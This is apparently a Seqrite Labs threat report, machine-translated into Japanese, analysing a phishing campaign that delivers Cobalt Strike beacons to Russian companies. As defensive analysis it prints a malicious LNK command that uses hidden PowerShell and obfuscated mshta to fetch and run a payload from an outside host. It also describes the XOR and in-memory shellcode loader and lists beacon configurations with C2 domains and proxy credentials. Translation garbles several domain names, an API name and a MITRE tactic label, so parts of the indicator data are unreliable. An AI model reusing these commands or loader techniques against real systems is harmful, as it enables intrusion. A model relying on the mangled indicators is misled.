オペレーション・フロストビーコン:ロシアを標的としたマルチクラスターコバルト攻撃キャンペーン
Contents
- イントロダクション
- 主なターゲット
- 地理的焦点
- 影響を受ける業界
- LNKクラスター
- 初期アクセス: アーカイブ配信
- フィッシングメールとおとり
- 悪意のあるLNKおよびHTAローダー
- 難読化された PowerShell ペイロード
- CVEクラスター
- フィッシングメール
- CVEの連鎖
- インフラストラクチャとアトリビューション
- 結論
- Seqrite 保護性能
- IOC
- MITRE TTP
- 著者
イントロダクション
Seqrite ラボは、ロシア連邦内の企業にCobalt Strikeビーコンを配信する、Operation FrostBeaconとして追跡されている標的型マルウェアキャンペーンを特定しました。フィッシングメールは、この脅威グループが金銭目的で、支払い、契約、照合、法的リスクを担当する組織を標的にしていることを示しています。20を超える初期感染ファイルが確認されており、侵入は2つの異なるクラスターを持つ多層感染チェーンに依存しています。1つは悪意のあるショートカットファイルを含むフィッシングアーカイブファイルを介して感染します。2つ目のクラスターは、古いCVE-2017-0199テンプレートインジェクション脆弱性を悪用し、さらに別の古い数式エディタの脆弱性CVE-2017-11882と連鎖させています。
どちらのクラスタも、リモートHTA実行をトリガーして難読化されたPowerShellローダーを起動します。このローダーはメモリ内でシェルコードを復号・実行することができ、Cobalt Strikeの展開につながります。攻撃者のエコシステムは、コマンドアンドコントロールエンドポイントとして設定された複数のロシア管理ドメインと、カスタマイズされたCobalt Strikeの柔軟なプロファイルを利用しています。各クラスタ内では複数の感染チェーンが観測されており、今年に入って複数の研究者によって実際に確認されたものもいくつかあります。このブログでは、複数のクラスタからの感染ワークフロー、ペイロードとともに追跡された関連インフラストラクチャ、そして攻撃者が使用する手法について、包括的な分析を提供します。
主なターゲット
地理的焦点
- ロシア連邦
影響を受ける業界
物流、工業生産、建設、技術供給を専門とするB2B企業。
- 財務部門
- 法務部門
- 企業情報メールボックス
LNKクラスター

初期アクセス: アーカイブ配信
感染チェーンは、フィッシングメールの添付ファイルによるアーカイブの配布から始まります。
ファイル名: рекламация.zip
MD5 : 7096141a5b480e793e9a890b84ebaee2更新日時: 2025-11-05 23:15:22初確認日時: 2025-11-06 00:08:46 UTC (ロシア)
名前、タイムスタンプ、および最初に確認されたテレメトリデータから、地理的な焦点が明確であり、このキャンペーンはロシア連邦のユーザーを直接ターゲットにしていることがわかります。ZIPファイルには2つのコンポーネントが含まれています。
- おとりのExcelワークブック 正当に見えるように意図された
- 悪意のあるLNKファイル PDF文書を装う
フィッシングメールとおとり
アーカイブファイル「рекламация」のロシア語ファイル名に基づいて、フィッシングメールが含まれていなかったため、同様の初期感染ファイルをさらに探しました。その結果、合計5つのファイルと、さらにいくつかの感染チェーン、そして興味深いメールが見つかりました。

ある感染チェーンでは、以下の画像に示すように、「Kristina.Yasnova@art[.]cse[.]ru」というメールIDから送信されたフィッシングメールが確認されています。RARアーカイブには、同様の方法でデコイファイルとショートカットファイルが含まれています。

これらのメールは、契約金の支払い、法的紛争、債権回収、仲裁、および取引の照合依頼に関するものです。これは、B2B決済や長期契約が一般的な業界では典型的なものです。この戦術は、攻撃者が被害者が馴染みのある文書名、特に母国語で書かれた文書名を信頼することを利用するソーシャルエンジニアリングキャンペーンと一致しています。「сводная」という単語は、物流、財務、報告の文脈でよく使われる要約/統合シートに翻訳されます。一部のアーカイブファイルには、開かれていない文書がありますが、これらは照合明細書ではなく血圧トラッカーを示すおとりのように見えます。

悪意のあるLNKおよびHTAローダー
ファイル名: рекламация.pdf.lnk
MD5: 16ae36df5bee92d8c4cae8e17583a2c9
LNKファイルは、二重拡張子形式によってPDF文書に見せかけるように偽装されています。ファイル名「рекламация」は「クレーム/苦情」を意味し、これもまたビジネス向けのメール詐欺によく使われる手法です。ユーザーがファイルをダブルクリックすると、cmd.exeを介して以下のコマンドが実行されます。
· /c powershell -WindowStyle Hidden -Command m^s^h^t^a^ ^h^t^t^p^s^:^/^/^e^z^s^t^a^t^.^r^u^/^f^l^o^w^e^r^s^f^o^r^l^o^v^e^.^g^i^f

実行チェーンには、いくつかの明確な悪意のある動作が見られます。PowerShellは非表示ウィンドウモードで起動し、ユーザーに警告するプロンプトが表示されないようになっています。攻撃者は、文字レベルの難読化(m^s^h^t^a)によってmshta.exeを起動し、単純な検出を回避しています。実行直後、スクリプトはリモートURLにアクセスして次の段階のペイロードを取得します。LNKファイルはローカルの偽ドキュメントを一切開かないため、感染はバックグラウンドで静かに進行します。LNKファイル内のURLは次のとおりです。
- hxxps://ezstat[.]ru/flowersforlove.gif
このリソースはGIF画像のように見えますが、リダイレクタまたはローダーステージとして機能します。mshta.exeがアクセスすると、サーバーは実際の悪意のあるコンポーネントを配信することで応答します。
· hxxps://valisi[.]ru/dosing.hta
HTAファイルは、攻撃の初期段階における主要な実行コンポーネントとして機能し、mshta.exeを介してWindowsの完全なスクリプト権限を利用することで、制限のないサイレントスクリプト実行を可能にします。

HTAがトリガーされると、複数のBase64エンコードされたブロックをgzip圧縮されたPowerShellスクリプトに再構成し、次の段階のペイロード配信環境を準備し、埋め込みロジックを通じて実行を開始します。これらの階層化されたエンコードにより、難読化が実現し、静的分析が阻害され、早期検知を回避しながら攻撃チェーンがスムーズに進行します。
難読化された PowerShell ペイロード
PowerShellの最終段階では、いくつかの重要な機能が実行されます。3層の難読化シーケンスが実装されており、各ステップは悪意のあるロジックの露出を意図的に遅らせるように設計されています。第1層は、MemoryStream内に埋め込まれたgzip圧縮されたBase64文字列です。これをデコードして解凍すると、第2段階のPowerShellスクリプトが生成されます。このスクリプトには、主に2つの機能が含まれています。
- func_get_proc_address: .NET内部クラスMicrosoft.Win32.UnsafeNativeMethods、特にそのメソッドを悪用して、管理されていないWindows APIアドレスを動的に解決します。 モジュールハンドルの取得 (NAIST) と GetProcAddress.
- func_get_delegate_type: System.Reflection.Emit を使用してランタイム デリゲート型を構築し、関数ポインターをマネージ デリゲートとして実行できるようにします。
それらの役割は、完全なメモリ内実行フレームワークを構築し、呼び出し宣言なしで、またディスクに成果物を書き込むことなく、ローダーが API を呼び出せるようにすることです。

この第2段階のスクリプトの中には、第3層にして最終層である、変数$v_codeに格納されたBase64エンコードされたデータブロックが含まれています。デコード後、スクリプトはキー35とのバイト単位のXOR演算を実行します。これにより、生のシェルコードバッファが生成され、その後、スクリプトはRWX割り当ての正しいパラメータ(割り当てタイプ0x3000、保護フラグ0x40)を使用してVirtualAllocで実行可能メモリを割り当てます。
復号化されたシェルコードは、動的に生成された関数ポインタを介してコピーされ、実行されます。この最終的なシェルコードは、Cobalt Strike Beaconローダーであり、多段階のファイルレス実行チェーンを完成させます。圧縮、ネストされたBase64、XORエンコーディング、動的API解決、およびメモリ内直接実行の組み合わせは、AMSIを回避し、EDR計測をバイパスし、ディスクベースの検出を完全に回避するために設計された現代の攻撃手法と一致しています。

この逆アセンブリは、マルウェアビーコンでよく見られるWindows x86シェルコードです。PEBをトラバースし、kernel32.dllを検索し、エクスポートされた関数名をROR-13アルゴリズムでハッシュ化することで、インポートなしでWin32 APIを動的に解決するリフレクションローダーを実装しています。これは、LoadLibraryA、GetProcAddress、VirtualAlloc、WinInet関数、その他のシステムコールへのポインタを取得するためです。

API セットを解決した後、wininet.dllをロードし、偽装されたヘッダーと jQuery ファイルに似たパス文字列を使用して通常の Web トラフィックを装った HTTP ベースのコマンド アンド コントロール チャネルを確立し、RWX メモリを割り当て、セカンダリ ペイロードをチャンク単位でダウンロードし、割り当てられた領域に書き込み、実行を新しく受信したコードに転送します。機能的には、これはリモート コマンド実行、ペイロード配信、および侵害されたホストの永続的な制御のために設計されたステージング マルウェア ビーコンとなります。ステージング構成は次のとおりです。
{'CobaltStrikeStager': {'raw': [{'netloc': 'update.ecols.ru', 'path': '/jquery-3.3.1.slim.min.js', 'port': 8443, 'headers': {'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9, / ;q=0.8′, 'Accept-Language': 'en-US,en;q=0.5', 'Referer': ' http://code.jquery.com/' , 'Accept-Encoding': 'gzip, deflate', 'User-Agent': 'Mozilla/5.0 (Windows NT 6.3; Trident/7.0; rv:11.0) like Gecko'}, 'inet_flags': ['INTERNET_FLAG_RELOAD', 'INTERNET_FLAG_NO_CACHE_WRITE', 'INTERNET_FLAG_SECURE', 'INTERNET_FLAG_KEEP_CONNECTION', 'INTERNET_FLAG_IGNORE_CERT_DATE_INVALID', 'INTERNET_FLAG_IGNORE_CERT_CN_INVALID', 'INTERNET_FLAG_NO_UI'], 'watermark': 987654321, 'type': 'HTTPS'}]}} {“Headers”: “Accept: text/html,application/xhtml+xml,application/xml;q=0.9, / ;q=0.8\r\nAccept-Language: en-US,en;q=0.5\r\nReferer: hxxp://code.jquery.com/\r\nAccept-Encoding: gzip, deflate\r\nUser-Agent: Mozilla/5.0 (Windows NT 6.3; Trident/7.0; rv:11.0) like Gecko\r\n”, “Type”: “Metasploit Download”, “URL”: “hxxp://update.ecols.ru/jquery-3.3.1.slim.min.js”}
この部分は、JS CDNダウンロードを装ったCobalt Strikeステージャーを表しています。これは、ステルスHTTP(S)経由でペイロードを取得し、Webトラフィックに紛れ込もうとする第一段階のローダーに典型的なものです。以下の設定は、より詳細なプロファイル、つまり完全に構成されたHTTPSビーコンを示しています。重要な詳細は以下の通りです。
- ペイロード難読化のためのBase64-URLデコードとXORを含む後処理
- ハードコードされたプロキシと資格情報
- プロセスインジェクションはNtMapViewOfSectionを使用します
{‘CobaltStrikeBeacon’: {‘raw’: [{‘BeaconType’: [‘HTTPS’], ‘Port’: 8443, ‘SleepTime’: 45000, ‘MaxGetSize’: 2801745, ‘Jitter’: 37, ‘MaxDNS’: ‘Not Found’, ‘PublicKey’: ‘30819f300d06092a864886f70d010101050003818d003081890281810084fcb90f0cb2f1dbe9de6913412e0a42fedd862c395c36c63006921d1eb5fe2860296e99283284318e84109d27ec8a17146ef21241c8012ec2ccd553b61663454d369b35189df81c8b0636513c4e9d97850e675bc3fb888bff30af985a21e5564f55c5be5275010d9b874f2a06b001ade04a3b5274bdacc1e6b8e239338f1165020301000100000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000’, ‘C2Server’: ‘update.ecols.ru,/jquery-3.3.1.min.js’, ‘UserAgent’: ‘Not Found’, ‘HttpPostUri’: ‘/jquery-3.3.2.min.js’, ‘Malleable_C2_Instructions’: [‘Remove 1522 bytes from the end’, ‘Remove 84 bytes from the beginning’, ‘Remove 3931 bytes from the beginning’, ‘Base64 URL-safe decode’, ‘XOR mask w/ random key’], ‘HttpGet_Metadata’: ‘Not Found’, ‘HttpPost_Metadata’: ‘Not Found’, ‘SpawnTo’: ‘00000000000000000000000000000000’, ‘PipeName’: ‘Not Found’, ‘DNS_Idle’: ‘Not Found’, ‘DNS_Sleep’: ‘Not Found’, ‘SSH_Host’: ‘Not Found’, ‘SSH_Port’: ‘Not Found’, ‘SSH_Username’: ‘Not Found’, ‘SSH_Password_Plaintext’: ‘Not Found’, ‘SSH_Password_Pubkey’: ‘Not Found’, ‘HttpGet_Verb’: ‘GET’, ‘HttpPost_Verb’: ‘POST’, ‘HttpPostChunk’: 0, ‘Spawnto_x86’: ‘%windir%\syswow64\dllhost.exe’, ‘Spawnto_x64’: ‘%windir%\sysnative\dllhost.exe’, ‘CryptoScheme’: 0, ‘Proxy_Config’: ‘hxxp://45.147.14.106:62900’, ‘Proxy_User’: ‘MxvNcQHY’, ‘Proxy_Password’: ‘3uuN9iwg’, ‘Proxy_Behavior’: ‘Use proxy server’, ‘Watermark’: 987654321, ‘bStageCleanup’: ‘False’, ‘bCFGCaution’: ‘False’, ‘KillDate’: 0, ‘bProcInject_StartRWX’: ‘False’, ‘bProcInject_UseRWX’: ‘False’, ‘bProcInject_MinAllocSize’: 17500, ‘ProcInject_PrependAppend_x86’: [‘9090’, ”], ‘ProcInject_PrependAppend_x64’: [‘9090’, ”], ‘ProcInject_Execute’: [‘ntdll:RtlUserThreadStart’, ‘CreateThread’, ‘NtQueueApcThread-s’, ‘CreateRemoteThread’, ‘RtlCreateUserThread’], ‘ProcInject_AllocationMethod’: ‘NtMapViewOfSection’, ‘bUsesCookies’: ‘True’, ‘HostHeader’: ”}]}} {“BeaconType”: [“HTTPS”], “Port”: 8443, “SleepTime”: 45000, “MaxGetSize”: 2801745, “Jitter”: 37, “C2Server”: “update.ecols.ru,/jquery-3.3.1.min.js”, “HttpPostUri”: “/jquery-3.3.2.min.js”, “Malleable_C2_Instructions”: [“Remove 1522 bytes from the end”, “Remove 84 bytes from the beginning”, “Remove 3931 bytes from the beginning”, “Base64 URL-safe decode”, “XOR mask w/ random key”], “HttpGet_Verb”: “GET”, “HttpPost_Verb”: “POST”, “HttpPostChunk”: 0, “Spawnto_x86”: “%windir%\syswow64\dllhost.exe”, “Spawnto_x64”: “%windir%\sysnative\dllhost.exe”, “CryptoScheme”: 0, “Proxy_Config”: “hxxp://45.147.14.106:62900”, “Proxy_User”: “MxvNcQHY”, “Proxy_Password”: “3uuN9iwg”, “Proxy_Behavior”: “Use proxy server”, “Watermark”: 987654321, “bStageCleanup”: “False”, “bCFGCaution”: “False”, “KillDate”: 0, “bProcInject_StartRWX”: “False”, “bProcInject_UseRWX”: “False”, “bProcInject_MinAllocSize”: 17500, “ProcInject_PrependAppend_x86”: [“kJA=”, “Empty”], “ProcInject_PrependAppend_x64”: [“kJA=”, “Empty”], “ProcInject_Execute”: [“ntdll:RtlUserThreadStart”, “CreateThread”, “NtQueueApcThread-s”, “CreateRemoteThread”, “RtlCreateUserThread”], “ProcInject_AllocationMethod”: “NtMapViewOfSection”, “bUsesCookies”: “True”, “HostHeader”: “”}
PowerShell 経由で MSHTA プロセスをトリガーし、最終的にメモリ内でシェルコードをデコードしてロードし、Cobalt Strike ビーコンを展開する、さまざまなドメインとステージャーのセットを使用する同様の感染ファイルがさらに確認されました。
CVEクラスター
2つ目のクラスターでは、フィッシング添付ファイルとしてDOCXファイルが送信されていることも確認されました。これは、一般的なCVE-2017-0199の脆弱性を悪用し、数式エディタを起動してリモートHTAファイルの実行を誘発するものです。

フィッシングメール
今回のフィッシングメールは、債務返済の法的要求を装っています。2025年3月14日までに支払いが行われない場合、ハバロフスク仲裁裁判所に延滞金(罰金と利息を含む)の回収を求める申し立てを行うと記載されています。メッセージには、契約書と思しき具体的な条項が引用されており、署名・認証済みの和解合意書と原本を法的住所に郵送し、メールのやり取りの記録を保持するよう要求されています。

同様の構成の別のメールでは、異なる支払期限と法的地域が挙げられています。契約書に基づき、支払いは銀行振込の日付をもって承認されると記載され、銀行口座情報を含む詳細な署名欄で締めくくられています。


同様のメールがさらに確認されており、手動または自動で再利用された大量フィッシングテンプレートが明確に示されています。悪意のあるドキュメント添付ファイルрекламация.docx内の word/settings.xml.rels ファイルには、以下に示すように、 aquacomplect[.]ruでホストされている外部テンプレートを参照する attachedTemplate 関係が含まれていました。

この構成により、Microsoft Word はドキュメントの初期化中にリモート テンプレートを要求して読み込みます。このような外部参照テンプレートは、 CVE-2017-0199に関連付けられた悪用手法と一致しており、攻撃者はマクロを必要とせずに、リモート URL を埋め込んでセカンダリ ペイロード (一般的には HTA またはスクリプト ベースのマルウェア) を配信します。したがって、 aquacomplect.ruドメインの存在は、ドキュメントが感染チェーンの一部としてリモート テンプレート インジェクションを使用していることを裏付けています。あるチェーンでは、埋め込みマクロまたは OLE オブジェクトを介した悪用ペイロードを含む RTF ファイルをダウンロードする 16 進数形式でエンコードされた HTML エンティティを特定しました。

CVEの連鎖
ほとんどの連鎖において、ドキュメントが数式エディタの別の古い脆弱性CVE-2017-11882を悪用するRTFファイルをダウンロードしていることが確認されました。何年も経った今でも、脅威アクターはパッチ適用後も依然としてこの脆弱性を悪用しようと試みています。これらの脆弱性は、CVE-2017-0199が配信に利用され、CVE-2017-11882はCobalt StrikeにつながるLNKクラスタに類似したリダイレクト後のリモートHTAファイルの実行に利用されるなど、同様の連鎖が実環境で確認されています。

2025年においても、SideWinderはこれらの特定のCVEを連鎖させ、南アジア(スリランカ、バングラデシュ、パキスタン)の高レベルの政府機関を標的とし、CVE-2017-0199とCVE-2017-11882の両方を悪用する悪意のあるWord/RTFファイルを初期感染ベクターとして使用した。
インフラストラクチャとアトリビューション
最終的なビーコンをダウンロードするCobalt Strikeステージャー「update[.]ecols[.]ru」のURLに基づいて、類似のものを検索し、次のクエリを使用して40以上のURLを特定しました。

これにより、類似のアーカイブファイルと文書ファイル、そしてロシア語で書かれた複数のデコイファイルを用いた追加キャンペーンが発見されました。観測されたドメインはすべてロシアのプロバイダーに登録されており、作成日の詳細は以下に記載されています。
| ドメイン | 作成日 | レコード |
| incident.zilab[.]ru | 2015-11-15T09:46:56Z | RU-CENTER-RU |
| mcnn[.]ru | 2004-10-18T20:00:00Z | R01-RU |
| order.edrennikov[.]ru | 2007-08-26T20:00:00Z | RU-CENTER-RU |
| cba.abc92[.]ru | 1999-10-26T15:07:24Z | RU-CENTER-RU |
| 法医学[.]jwork[.]ru | 2009-05-06T20:00:00Z | RD-RU |
| ホストbynet[.]ru | 2017-04-09T21:43:46Z | R01-RU |
| moscable77[.]ru | 2019-03-26T11:32:10Z | れぐるる |
| gk-stst[.]ru | 2023-01-12T05:38:27Z | REGTIME-RU |
| アクアコンプレクト[.]ru | 2016-02-26T15:47:04Z | れぐるる |
| ezstat[.]ru | 2011-01-13T13:41:30Z | RU-CENTER-RU |
| ekostroy33[.]ru | 2020-10-14T07:22:13Z | R01-RU |
| ヴァリシ[.]ル | 2016-03-11T10:14:40Z | れぐるる |
| bsprofi[.]ru | 2010-12-29T11:51:35Z | REGTIME-RU |
| イプリス[.]ru | 2011-01-15T19:15:01Z | RU-CENTER-RU |
| ゼタグ[.]ru | 2015-12-18T09:47:12Z | RD-RU |
| リエリ[.]ル | 2020-03-04T15:48:22Z | れぐるる |
| 投与ポンプ[.]ru | 2015-04-03T08:57:01Z | RD-RU |
| esetnod64[.]ru | 2023-08-14T16:38:10Z | れぐるる |
| ヤドロ[.]ル | 2000-12-19T21:00:00Z | RU-CENTER-RU |
| iplogger[.]ru | 2011-01-22T04:15:13Z | RU-CENTER-RU |
| krona77[.]ru | 2018-12-19T11:06:01Z | ベゲット・ル |
| bti25[.]ru | 2022-12-10T06:57:06Z | ベゲット・ル |
| emec[.]su | 2015-06-05T16:01:05Z | RD-SU |
| ジェムコッティ[.]ru | 2016-02-02T20:21:38Z | れぐるる |
分析の結果、フィッシングメールの内容と標的から判断すると、攻撃者はロシア語を話す金銭目的のサイバー犯罪グループであると判断しました。世界中の金融機関を標的としたコバルトグループと、攻撃手法(TTP)や標的設定に重複が見られましたが、今回の「オペレーション・フロストビーコン」で使用された特定のマルウェアファミリーは確認されていません。
結論
Seqrite Labsは、ロシアのB2B企業、特に財務部門と法務部門を標的としたマルチクラスター攻撃キャンペーンを分析しました。Operation FrostBeaconとして追跡されているこの金銭目的のサイバー犯罪グループは、悪意のあるDOCXファイルと武器化されたZIPアーカイブという2つの並行した配信経路を使用しており、どちらも最終的には同じ目標、つまりCobalt Strike Beaconのメモリ内展開に収束します。
最初の感染経路では、脅威アクターはCVE-2017-0199を悪用するWord文書を配布し、これがCVE-2017-11882に連鎖しています。これとは対照的に、2番目の感染経路では、ショートカットファイルを含む悪意のあるアーカイブが配信されます。どちらの経路も、ロシアのドメインにリダイレクトされた後、リモートHTAファイルの実行につながり、多層構造のPowerShellローダーが起動されます。ローダーは3層のエンコードを使用してシェルコードを実行し、ステージャーをダウンロードして正規のプロセスにインジェクションを行い、最終的にCobalt Strikeをステルス的に展開します。
Seqrite 保護性能
- lnk.trojan.1762957461
- トロイの木馬A18583779
- lnk.trojan.1742297824
- トロイの木馬.スクリプト.38976
- ジェネリックPMF.S30570383
IOC
| アーカイブ | |
| 7096141a5b480e793e9a890b84ebaee2 | рекламация.zip |
| 833aa0a39625a4014c3c019ecf06a577 | рекламация.rar |
| 8ddcc3d272dd6b926d5c439a59198b51 | договор.rar |
| 58f1700e70ea49c0c520429fae09391b | (RAR) |
| メールアドレス | |
| c088e4f9875bf4df552e418a54c4ce07 | クリスティーナ・ヤスノヴァ@art.cse[.]ru |
| 7261fc5b42cc63ae34f520fc8f3ef5a4 | kornilova@impex-him[.]ru |
| c088e4f9875bf4df552e418a54c4ce07 | クリスティーナ・ヤスノヴァ@art.cse[.]ru |
| 8f60ad980885ff0000f6a9d29ce95376 | asrogov@kzst45[.]ru |
| 5facd6d79a20249fd58c29f9dc98dfe2 | asrogov@kzst45[.]ru |
| bbd10ee2ff2488faa297593e79df4512 | karina@toolhaus[.]ru |
| 456289209b90d09e54a1a439e3fe5248 | karina@toolhaus[.]ru |
| 7340c916254e31e0dbb7fcec7a89cfb0 | yakovleva@effectovent[.]ru |
| 8ba9f38456557e58bf4613b363298d55 | yakovleva@effectovent[.]ru |
| 08fc33687a6158dd15aa72e631905e10 | yakovleva@effectovent[.]ru |
| 48d588add63a0373ec896da4ee59b79e | buh@toolhaus[.]ru |
| LNK | |
| 16ae36df5bee92d8c4cae8e17583a2c9 | рекламация.pdf.lnk |
| eb0516a78fa169ab0867cb9b98136357 | рекламация.pdf.lnk |
| 16e9c51f60b629257140cb6ffc7a36ec | рекламация.pdf.lnk |
| f16417878356a08f840dac7f03461b5d | акт сверки.xls.lnk |
| 5e51ff594c46170ef278d1c18cded7d0 | Договор.pdf.lnk / досудебное.pdf.lnk |
| ドキュメント | |
| ff96714b6e31e362e7acce7338f30cf0 | рекламация.docx |
| f3a4176a981e50d76b8e4716400e86f2 | рекламация.docx |
| 0e1aa36d57416bac883e11f5860348cc | рекламация.doc |
| adf61ffa03806b954450c8954fb976c7 | рекламация.doc |
| 94b800809107fb2ef6ec640ff1e0fb51 | рекламация.doc |
| 6d4691e3262d4271f76b14a9ea511ca5 | претензия.docx |
| dfb56174c5ec2d0d8d82eb4b5ebf4f38 | требование_19.03.docx |
| 8d0821b0bb290beb156ad836237cff05 | досудебное.doc |
| f9026fabfb8d131863ad06fd72eb2717 | исковое_19.03.docx |
| 5461a16272491f8e8b460c687d3436a6 | претензия.doc |
| 5667aa62833dd6ebd15da40130ab963d | рекламация_исх_05.04.24.doc.doc |
| 55bcc275baaae11ab634c03a9de36557 | シロ.doc |
| dcad3be881d072240b4c5c601e562ed2 | キツネ.docx / アクア.docx |
| a02f62d86f127b2547beac11420165fa | reklamatsiia.doc |
| 5efb844fefdbd92ccab34a5ec135ecac | tmppzd1p0zv.docx |
| 30517af2afba9baf55941c250cfd8a0f | トランプ.rtf |
| cdfb407a0b894f5b4a6108273b81d864 | ロジスタ.rtf |
| 98f21aabbf9a76d762813d6c0ec8c876 | 最初の.rtf |
| 600aeffa4395c00be2958fd8dd5135a8 | ゴーゴー.rtf |
| 2e8a01026b5c298a9b1d2519241f0b16 | openai.rtf |
| 582f7f2c93b6e14fb6c14a9b3ad09a83 | bg.rtf |
| ef854d4cb12974fc702d10b403b3ef0b | ケア.rtf |
| c1f40aeaf0606255920a3b82e80b64cc | (RTF) |
| ac558fd07ffa0d6831d523b8af8ac80b | (RTF) |
| c1f40aeaf0606255920a3b82e80b64cc | (RTF) |
| 6b8d22221e7c0dbcde24bc687a7dd6cd | (RTF) |
| a5bc486ca38160ae9f54650d790d9684 | (RTF) |
| ba8a950edf8c1414a978d9a4111343e2 | (DOCX) |
| HTA | |
| 020829a48c813d34aa68bcda4695144e | 投与.hta |
| 74f23f2e1e9d209d0961bbf6ff74dafe | やあ。 |
| 2516898e2cb2cb1dca166bc69b7379c2 | 複雑な.hta |
| adef76d41463df53283588622c5e48e3 | min.hta |
| dcdc1bad9fb1c049b7f28afa7dc8712a | z.hta |
| a20f54df1e75c661d6670447d74ce6f7 | (HTA) |
| 976649b232d3525dd239f7139a65dd92 | ロジスタ |
| 9e5488696f4c5bf354e2e94775d9277c | 利益.hta |
| 7059cd5ff17c2983ee6f33053d501ab3 | 中国 |
| 835f3661ef77bc4c083f6da9b11c6e5e | nciki.hta |
| 594d802ceebb1042101ffafa3e98caa6 | ミダ.hta |
| 8bddf8880ab3c631abd3ca452924d556 | ゲイズ.hta |
| コバルトストライクステージャー/ビーコン | |
| f87227dad7bedf66bf1a1b97aa36bf62 | |
| 2c18c78ec584c5d2d045c9ab94774ad7 | |
| 395da66bee080c943e820b4e61e50de6 | |
| 315bcab1a9cbfe0b5b24676c2016a9cc | |
| 4ac75939c482d5c30637d56a379835f1 | |
| feae3d231a354882bb0f70889cc69a74 | |
URLは
| トリガー |
| hxxps://ezstat.ru/flowersforlove.gif |
| hxxps://yip.su/txttxt.jpg |
| hxxps://ezstat.ru/txttx.txt |
| hxxps://iplis.ru/lovers.jpeg |
| hxxps://iplis.ru/tramp.jpg |
| hxxps://iplis.ru/laydowngrenade.jpeg |
| hxxps://iplogger.cn/forensicsas.png |
| hxxps://iplis.ru/penises.jpg |
| hxxps://ezstat.ru/kissmyass.gif |
| hxxps://iplis.ru/camorra.gif |
| hxxps://yip.su/ncikigovru.gif |
| hxxps://valisi.ru/dosing.hta |
| hxxp://canature.su/ya.hta |
| hxxp://aquacomplect.ru/complex.hta |
| hxxps://bsprofi.ru/min.hta |
| hxxp://zetag.ru/z.hta |
| hxxp://vlasta-s.ru/logista.hta |
| hxxp://ecols.ru/ecols.hta |
| hxxp://zetag.ru/z.hta |
| hxxps://bsprofi.ru/profit.hta |
| hxxp://dosingpumps.ru/nciki.hta |
| hxxps://yip.su/certgovrufuck.gif |
| hxxp://zetag.ru/siro.doc |
| hxxp://zetag.ru/tramp.rtf |
| hxxp://aquacomplect.ru/aqua.docx |
| hxxp://clack.su/fox.docx |
| hxxp://vlasta-s.ru/logista.rtf |
| hxxp://valisi.ru/first.rtf |
| hxxp://ecols.ru/gogo.rtf |
| hxxp://bti25.ru/openai.rtf |
| hxxp://bti25.ru/china.hta |
| hxxp://gemme-cotti.ru/mida.hta |
| hxxp://xn--e1ajbcejcefx.xn--p1ai/sflopytrgjklhfaseri |
| hxxp://emec.su/bg.rtf |
| hxxp://gemme-cotti.ru/cotti.docx |
| hxxp://gemme-cotti.ru/zibaba.hta |
| hxxps://ipgrabber.ru/penis.gif |
| hxxps://iplogger.ru/sugar.png |
| hxxp://ship-care.com/care.rtf |
| hxxp://krona77.ru/edr.hta |
| hxxps://update.ecols.ru:8443/jquery-3.3.1.slim.min.js |
| hxxps://incident.zilab.ru:8443/jquery-3.3.1.slim.min.js |
| hxxps://mcnn.ru:8443/jquery-3.3.1.slim.min.js |
| hxxp://poopy.aarkhipov.ru:8080/jquery-3.3.1.slim.min.js |
| hxxps://ekostroy33.ru/jquery-3.3.2.min.js |
| hxxp://order.edrennikov.ru/jquery-3.3.1.min.js |
| hxxps://cba.abc92.ru:8443/jquery-3.3.1.slim.min.js |
| hxxps://moscable77.ru:8443/jquery-3.3.1.slim.min.js |
| hxxp://forensics.jwork.ru/jquery-3.3.1.slim.min.js |
ドメイン
| 更新.ecols[.]ru
incident.zilab[.]ru mcnn[.]ru order.edrennikov[.]ru cba.abc92[.]ru forensics.jwork[.]ru ホストbynet[.]ru moscable77[.]ru gk-stst[.]ru アクアコンプレクト[.]ru ezstat[.]ru ekostroy33[.]ru ヴァリシ[.]ル bsprofi[.]ru イプリス[.]ru ゼタグ[.]ru リエリ[.]ル 投与ポンプ[.]ru esetnod64[.]ru ヤドロ[.]ル iplogger[.]ru krona77[.]ru bti25[.]ru |
プロキシIP
| 45.147.14.106:62900 | AS 49505 (JSC Selectel) RU |
| 45.145.91.164:64830 | AS 49505 (JSC Selectel) RU |
MITRE TTP
| 戦略 | テクニックID | 技術 |
| 初期アクセス | T1566.001 | スピアフィッシング添付ファイル |
| 実行 | T1204.002 | ユーザーの実行:悪意のあるファイル |
| 実行 | T1221 | テンプレートインジェクション |
| 実行 | T1059.003 | コマンド&スクリプトインタープリター: PowerShell |
| 防衛回避 | T1027 | 難読化/暗号化されたファイルまたは情報 |
| 防衛回避 | T1140 | ファイルまたは情報の難読化/デコード |
| 防衛回避 | T1055 | プロセス射出 |
| プーケットの魅力 | T1082 | システム情報の発見 |
| プーケットの魅力 | T1016 | システムネットワーク構成の検出 |
| コマンドおよび制御 | T1105 | 入力ツール転送 |
| コマンドおよび制御 | T1071.001 | アプリケーション層プロトコル:Webプロトコル |
| コマンドおよび制御 | T1090 | プロキシ/リダイレクタの使用 |
著者
- ラヤパティ・ラクシュミ・プラサンナ・サイ
- サトウィック・ラム・プラッキ


